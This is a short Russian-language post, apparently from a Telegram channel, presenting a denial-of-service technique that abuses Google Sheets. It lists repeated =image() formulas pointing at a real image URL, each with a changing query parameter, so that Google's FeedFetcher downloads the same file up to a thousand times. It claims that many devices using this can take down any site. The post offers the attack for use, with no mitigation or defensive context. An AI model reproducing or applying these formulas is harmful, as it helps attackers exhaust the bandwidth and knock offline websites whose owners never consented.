DDOS атака с помощью Google Таблицы
Onion Sharks 🦈Google используется инструмент FeedFetcher для кэширования контента в Google Таблицы, вставленного через формулу:
=image("URL изображения")
Допустим, если в ячейку таблицы вставить данную формулу, то Google отправит FeedFetcher скачивать данное изображение и кэшировать его для дальнейшего изображения. Но если добавить случайный параметр к URL изображения, FeedFetcher будет повторно скачивать данное изображение.
Пример:
=image("https://i.ytimg.com/vi/QdapEXoPDqg/maxresdefault.jpg?r=1")
=image("https://i.ytimg.com/vi/QdapEXoPDqg/maxresdefault.jpg?r=2")
=image("https://i.ytimg.com/vi/QdapEXoPDqg/maxresdefault.jpg?r=3")
=image("https://i.ytimg.com/vi/QdapEXoPDqg/maxresdefault.jpg?r=4")
=image("https://i.ytimg.com/vi/QdapEXoPDqg/maxresdefault.jpg?r=5")
=image("https://i.ytimg.com/vi/QdapEXoPDqg/maxresdefault.jpg?r=6")
=image("https://i.ytimg.com/vi/QdapEXoPDqg/maxresdefault.jpg?r=7")
=image("https://i.ytimg.com/vi/QdapEXoPDqg/maxresdefault.jpg?r=8")
=image("https://i.ytimg.com/vi/QdapEXoPDqg/maxresdefault.jpg?r=9")
...
=image("https://i.ytimg.com/vi/QdapEXoPDqg/maxresdefault.jpg?r=1000")
Допустим, наше изображение весит 5 МБ. FeedFetcher с помощью такой вставки скачает одно и то же изображение 1000 раз, что может привести к исчерпанию лимита трафика.
Используя большое количество устройств можно положить любой сайт. Сам же инструмент FeedFetcher для скачивания изображения использует несколько IP-адресов, но User-Agent все один и тот же.
Забавно, что абсолютно любой человек с помощью одного только сервиса Google Таблицы доставить столько проблем. К слову, данный метод существует еще с 2012 года.
Весь материал принадлежит телеграмм каналу Onion Sharks 🦈